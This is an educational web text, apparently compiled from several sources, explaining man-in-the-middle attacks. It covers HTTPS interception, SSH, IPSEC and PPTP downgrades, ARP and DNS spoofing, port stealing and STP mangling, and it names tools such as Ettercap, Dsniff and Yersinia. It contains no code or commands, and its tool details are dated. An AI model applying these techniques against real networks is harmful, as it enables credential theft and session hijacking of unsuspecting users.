The man-in-the middle attack intercepts a communication between two systems. For example, in an http transaction the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server, as shown in figure 1. Once the TCP connection is intercepted, the attacker acts as a proxy, being able to read, insert and modify the data in the intercepted communication.
Figure 1. Illustration of man-in-the-middle attack
The MITM attack is very effective because of the nature of the http protocol and data transfer which are all ASCII based. In this way, it’s possible to view and interview within the http protocol and also in the data transferred. So, for example, it’s possible to capture a session cookie reading the http header, but it’s also possible to change an amount of money transaction inside the application context, as shown in figure 2.
Figure 2. Illustration of a HTTP Packet intercepted with Paros Proxy.
The MITM attack could also be done over an https connection by using the same technique; the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but the user may ignore the warning because he doesn’t understand the threat. In some specific contexts it’s possible that the warning doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.
MITM is not only an attack technique, but is also usually used during the development step of a web application or is still used for Web Vulnerability assessments.
MITM Attack tools
There are several tools to realize a MITM attack. These tools are particularly efficient in LAN network environments, because they implement extra functionalities, like the arp spoof capabilities that permit the interception of communication between hosts.
- Cain e Abel
MITM Proxy only tools
Proxy tools only permit interactiion with the parts of the HTTP protocol, like the header and the body of a transaction, but do not have the capability to intercept the TCP connection between client and server. To intercept the communication, it’s necessary to use other network attack tools or configure the browser.
- OWASP WebScarab
- Paros Proxy
- Burp Proxy
- Odysseus Proxy
- Fiddler (by Microsoft)
Man-In-The-Middle attack is the type of attack where attackers intrude into an existing connection to intercept the exchanged data and inject false information. It involves eavesdropping on a connection, intruding into a connection, intercepting messages, and selectively modifying data.
The term "Man-in-the-middle attack" (MITM attack) refers to the type of attack where the attacker intrudes into the communication between the endpoints on a network to inject false information and intercept the data transferred between them.
- MITM attack is also known as:
- Bucket-brigade attack
- Fire brigade attack
- Monkey-in-the-middle attack
- Session hijacking
- TCP hijacking
- TCP session hijacking
- Name Origin: The name "Man-in-the-Middle" is derived from the basketball scenario where two players intend to pass a ball to each other while one player between them tries to seize it. MITM attacks are sometimes referred to as "bucket brigade attacks" or "fire brigade attacks." Those names are derived from the fire brigade operation of dousing off the fire by passing buckets from one person to another between the water source and the fire.
In cryptography, the man-in-the-middle attack or bucket-brigade attack (often abbreviated MITM), sometimes Janus attack, is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker.
Man-in-the-Middle Attack (MITM) is a type of attack where a user gets between the sender and receiver of information and sniffs any information being sent.
- Man-in-the-middle attacks (MITM)
- Attacks in which the attacker infiltrates unnoticed the communication channel between two partners and is thereby able to spy on or even modify their data exchanges.
Man-in-the-Middle attacks are often referred to as "session hijacking attacks", suggesting that the intruder aims to gain access to a legitimate user's session to tamper it. The attack usually starts with sniffing and eavesdropping on a network stream, and ends with trying to alter, forge or reroute the intercepted data.
Man-in-the-Middle attacks are usually selected by hackers against public-key cryptosystems. In a public key scenario, hackers may substitute the intercepted public key with their forged public keys. Quite often in such cases, the victim parties are made to believe that they remain safe in communicating with each other.
A common MITM attack scenario may involve the attacker having insinuated into the communication between a client and a server. In such scenarios, the attacker often transmits deceitful messages between the client and the server to make them feel safe in communicating with each other. Technically, the attacker can use a program which appears like a server to the client or vice versa.
The client/server scenario can be simply illustrated below:
Client |---Decrypt-->>|MITM attacker|---Recrypt-->>| Server
In MITM attacks, the attacker tries to get between two target network endpoints, and proxies all the communication between them. Once the trial is successful, further attacks to be launched may include sniffing the passing packets, hijacking already authenticated sessions, injecting packets or commands to the server, and sending the forged responses to the victim client.
MITM attacks are chiefly intended for sensitive and valuable information. MITM attacks are frequently chosen to intercept both HTTP and HTTPS communications. However, a successful MITM attacker has to deceitfully direct the target endpoint (i.e., the victim) to the attacker's proxy server instead of the real server.
One of the objectives for MITM attacks is to gain access to the client's messages and modify them before finally transmitting them to the server end. Other objectives of MITM can be to mislead the communicators at the client or server end, to intercept pertinent information (e.g., identity, address, password, or any other confidential information for malicious purposes) and also, at times, manipulate transactions.
Public Key Exchanging
MITM attacks are a common risk to web-based financial transaction systems - e.g., e-business websites, payment gateways, and online banking, insurancing and credit card servicing platforms. MITM attacks may lead to identity thefts and financial frauds.
In such a scenario, a MITM attacker may intercept the communication of public keys exchanged by the client and the server, and modify the public keys for a malicious purpose. To successfully avoid any suspicion from either relevant party, the attacker must also intercept the relevant encrypted messages and responses, and use the correct public keys to decrypt and recrypt them for all communication segments in every instance. Such attacking jobs, though seemingly too tough to accomplish, pose a real risk to insecure networks (e.g., the Internet, and wireless networks).
Command injection, as an older type of common injection attacks, is chiefly chosen by MITM attackers to hijack an already authenticated session, inject commands to the server and emulate fake replies to the client.
Malicious Code Injection
MITM attackers can insert codes into mails, SQL statements and web pages(i.e., SQL injection, HTML/script injection or cross-site scripting), and even modify the binary files being downloaded to implant victim clients with a backdoor or to change the execution process of the downloaded programs.
Downgrade Attacks - SSH V2 to V1
Alberto Ornaghi and Marco Valleri observe that MITM attackers may manage to change the parameters exchanged between the target endpoints (e.g., server and client) at the start of their connection. According to their presentation at Blackhat Conference Europe 2003, the MITM attacker may "force the client to initialize a SSH1 connection instead of SSH2" via a filter to substitute the parameter "1.99" for SSH V2 with the one "1.51" for SSH V1. Meanwhile, Alberto and Marco also classify such scenarios as those of "Parameters and Banners Substitution."
- Downgrade Attacks - SSH V2 to V1: The term "Downgrade Attack" here refers to an attack that forces the victims to use the less secure features, functions or protocols which remain supported for backward-compatibility reasons. Downgrade attacks may cover SSH (Secure SHell), IPSEC (Internet Protocol SECurity), and PPTP (Point-to-Point Tunneling Protocol).
Downgrade Attacks - IPSEC Failure
MITM attackers may impede the keymaterial exchanged on UDP Port 500 to deceive the victims into thinking that an IPSEC connection cannot start on the other side. That would result in the clear text stream over the connection without being noticed if the victim host is configured in rollback mode.
Downgrade Attacks - PPTP
During the protocol negotiation phase at the beginning of a PPTP session, MITM attackers may force the victims to use the less secure PAP authentication, MSCHAP V1 (i.e., downgrading from MSCHAP V2), and even no encryption at all.
Attackers can also force re-negotiation (Terminate-Ack packet in clear text), steal passwords from existing tunnels, and repeat previous attacks.
Attackers can compel "password change" to get password hashes that can be utilised directly by a modified SMB or PPTP client. MSCHAP V1 hashes can also be forceed.
- PPTP: PPTP (Point-to-Point Tunneling Protocol) is a protocol for VPN implementation. Microsoft MSCHAP-V2 or EAP-TLS is used to authenticate PPTP connections. The EAP-TLS (Extensible Authentication Protocol-Transport Layer Security) is certificate based, and thus is a safer security option for PPTP than MSCHAP-V2.
The techniques used for MITM attacks can be classified below in consideration of the following three network environment types:
- Local Area Network
- From Local To Remote (through a gateway)
Local Area Network
- ARP spoofing
- Briefing: ARP (Address Resolution Protocol) spoofing is also known as "ARP poisoning" or ARP Poison Routing. The attacker may use ARP spoofing to sniff data frames on LAN and to modify the packets. The attacker may corrupt the ARP caches of directly connected hosts and finally take over the IP address of the victim host.
- Tools used:
- ARPoison is a UNIX Command-line tool that can be used to create spoofed ARP packets.
- Ettercap can be used for filtering, hijacking, poisoning, sniffing, including SSH v.1 sniffing (transparent attack).
- Dsniff can be used for poisoning, sniffing, including SSH v.1 sniffing (proxy attack)
- Parasite is a daemon used to watch a LAN for ARP requests and automatically send spoofed ARP replies.
- DNS spoofing
- Briefing: The attacker starts by sniffing the ID of any DNS request, and then replies to the target requests before the real DNS server.
- Tools used:
- ADM DNS spoofing tools can spoof DNS packets via various active and passive methods.
- Ettercap (Plugin needed: phantom plugin)
- Dsniff (dnsspoof)
- Zodiac can be used for DNS name server versioning, DNS local spoofing (answering DNS queries before the remote name server), DNS jizz spoofing, and DNS ID spoofing.
- IP address spoofing
- Briefing: The attacker creates IP packets with a forged source IP address in order to conceal the identity of the packet sender or to impersonate another computer system. (This method of attack on a remote system can be very difficult, because it involves modifying thousands of packets at a time. This type of attack is most effective where trust relationships exist between endpoints.)
- Tools used:
- Hping can be used to prepare spoofed IP datagrams with only a one-line command, and the attacker can send the prepared datagrams to almost any target victim.
- Spoofed IP
- Port stealing
- Briefing: The term "Port Stealing" refers to the MITM technique used to spoof the switch forwarding database (FDB) and usurp the switch port of the victim host for packet sniffing on Layer 2 switched networks. The attacker starts by flooding the switch with the forged ARP packets that contain the same source MAC address as that of the victim host and the same destination MAC address as that of the attacker host. Note that those packets are invisible to other host on the same network. Now that the victim host also sends packets to the switch at the same time, the switch will receive packets containing the same source MAC address with two different ports. Therefore, the switch will repeatedly alter the MAC address binding to either of the two ports by referencing the relevant information in the packets. If the attacker's packets are faster, the switch will send the attacker the packets intended for the victim host. Then the attacker sniffs the received packet, stops flooding and sends an ARP request for the victim’s IP address. After receiving the ARP reply from the victim host, the attacker will manage to forward the "stolen" packet to the victim host. Finally, the flooding is launched again for another attacking cycle.
- Tools used:
- Ettercap (Plugin needed: Confusion plugin)
- STP mangling
- Briefing: STP (Spanning-Tree Protocol) mangling refers to the technique used for the attacker host to be elected as the new root bridge of the spanning tree. The attacker may start either by forging BPDUs (Bridge Protocol Data Units) with high priority assuming to be the new root, or by broadcasting STP Configuration/Topology Change Acknowledgement BPDUs to get his host elected as the new root bridge. By taking over the root bridge, the attacker will be able to intercept most of the traffic.
- Tools used:
- Ettercap (Plugin needed: Lamia plugin)
From Local To Remote (through a gateway)
- ARP poisoning
- DNS spoofing
- DHCP spoofing (e.g., Spoofing the DHCP Server)* is a type of attack on DHCP server to obtain IP addresses using spoofed DHCP messages
- Gateway spoofing (usually, spoofing the default gateway)
- ICMP redirection
- IRDP spoofing - route mangling
- DNS poisoning
- Route mangling
- Traffic tunneling
The fowllowing tools are commonly used for launching, detecting or testing MITM attacks.
- Tool Name: Ettercap
- Current Version: NG-0.7.3 (Release Date: May 29, 2005)
- Developer: Alberto Ornaghi, Marco Valleri
- FreeBSD 4.x 5.x;
- Linux 2.0.x, 2.2.x, 2.4.x, 2.6.x;
- Microsoft Windows 2000/XP/2003;
- NetBSD 1.5;
- OpenBSD 2., 3.x;
- OS X (darwin 6.x, 7.x);
- Solaris 2.x.
- Commercial or Freeware: Freeware
- URL: ettercap.sourceforge.net
- Briefing: Ettercap is a multipurpose hacking suite for the switched LAN environment. As a LAN-based sniffer, interceptor and logger, it is chiefly featured by live-connection sniffing and content filtering on the fly. It supports the active and passive dissection of many protocols (even the ciphered ones) and includes some functionalities for network and host analysis. Ettercap can be used to launch an MITM attack via ARP poisoning or port stealing.
- Tool Name: Dsniff
- Current Version: 2.3 (Release Date: December 19, 2000)
- Developer: Dug Song
- OpenBSD (i386);
- Redhat Linux (i386);
- Solaris (sparc).
- Commercial or Freeware: Freeware
- URL: www.monkey.org/~dugsong/dsniff
- Briefing: Dsniff is claimed as a tool suite developed for network auditing and penetration testing, but the attacker can use it for SSL MITM attacks. Its components "dsniff", "filesnarf", "mailsnarf", "msgsnarf", "urlsnarf", and "webspy" can be used to passively monitor a network for sensitive data (e-mail, files and passwords). Its other components like "arpspoof", "dnsspoof", and "macof" allow the attacker to intercept network packets normally unavailable to the attacker. Its components "SSHMITM" and "WEBMITM" may help the attacker to launch active man-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.
- Tool Name: Yersinia
- Current Version: 0.7.1 (Release Date: May 8, 2007)
- Developer: Alfredo Andrés Omella (Slay), David Barroso Berrueta (tomac)
- Linux 2.4.x and 2.6.x;
- Mac OSX 10.4 Tiger (Intel);
- OpenBSD 3.4 (note: upgrade your pcap libraries to at least 0.7.2);
- Solaris 5.8 64bits SPARC.
- Commercial or Freeware: Freeware
- URL: www.yersinia.net
- Briefing: Yersinia takes its name from the bacteria "Yersinia pestis." It can be used to exploit the vulnerabilities of the following network protocols: STP, CDP, DTP, DHCP, HSRP, IEEE 802.1Q, IEEE 802.1X, ISL (Inter-Switch Link Protocol), and VTP (VLAN Trunking Protocol).
FOLLOW-UP: RISK SHEET
|AUTHENTICATION SOLUTION||MITM RISKS|
|On public Ethernets or wireless LANs, station identities and password hashes can be easily sniffed. EAP-MD5 does not provide mutual authentication or EAP server authentication. Thus, MITM attackers may disguise as access points to deceive legal users into authenticating to the rouge AP.|
|The systems protected by EAP-TTLS are still vulnerable to MITM attacks because user passwords can be more easily guessed, shared, or disclosed via social engineering than client-side certificates.|
|The systems protected by LEAP are still vulnerable to MITM attacks.|
|The systems protected by PEAP are still vulnerable to MITM attacks.|
Key Fobs and One Time Password (OTP) tokens
|Token-based and smart-card-based OTP systems are vulnerable to MITM attacks. Attackers may hijack online sessions by deceiving legal users into providing one-time-PINs produced by tokens or smart cards.
Risk Level: MEDIUM
|Credentials can sometimes be stolen in a MITM attack using a proxy server.
Risk Level: LOW
- EAP: Extensible Authentication Protocol
- LEAP: Light Extensible Authentication Protocol
- PEAP: Protected Extensible Authentication Protocol
- TTLS: Tunneled Transport Layer Security